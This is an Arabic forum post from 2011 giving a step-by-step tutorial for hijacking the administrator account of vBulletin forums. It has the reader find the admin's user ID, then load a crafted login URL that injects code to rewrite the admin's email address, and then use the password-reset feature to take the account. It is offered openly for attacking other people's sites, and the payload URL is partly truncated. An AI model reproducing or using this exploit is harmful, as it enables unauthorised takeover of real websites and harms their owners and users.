rohani abdo
Admin
عدد المساهمات : 485
تاريخ التسجيل : 21/02/2010
العمر : 48
الموقع : www.taaam-ma.ahlamontada.com
 |  موضوع: ثغرة لمنتديات vB  السبت أكتوبر 08, 2011 5:55 pm | |
| ثغرة لمنتديات vB
اول شي بشركم
الثغرة معفنة وسمك الغبرة عليها .........
يعني اذا لقيتلك شي موقع اهله من زمبباوي يمكن تقجر تخترقه بهل الثغرة
ويمكن هدول ماتمش معاهم
والله لامانة الثغرة منقولة بس نسيان المصدر من وين ( الاخ محشش) :-P
قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
http://target/memberlist.php
target= العنوان المستضيف للمنتدى
مثل = - .com
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل
بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
http://URL/member.php?soitgoe68e45u...info&userid=266
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
http://URL/member.php?soitgoe68e45u...etinfo&userid=1
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
CODE
http://target/member.php?action=login&...VALIDPASS&url=');'.$use
rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WH E
RE+username='ADMIN'').'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
login = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات
refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
http://target/index.php
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة (
يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
وبشوااااااااااااااااا شباب اذا مشيت معكم الثغره
:-P :-P :-P
ملاحظة :::: لن يكتب ابدا ثغرات جديدة عن هذا النوع من المنتديات لان
المنتدات العربية تسعملها بكثرة والي حابب يرعف ثغرات حديثة بقلوا فكر شوي
وانتي بتلاقي الحل ...... | |
|
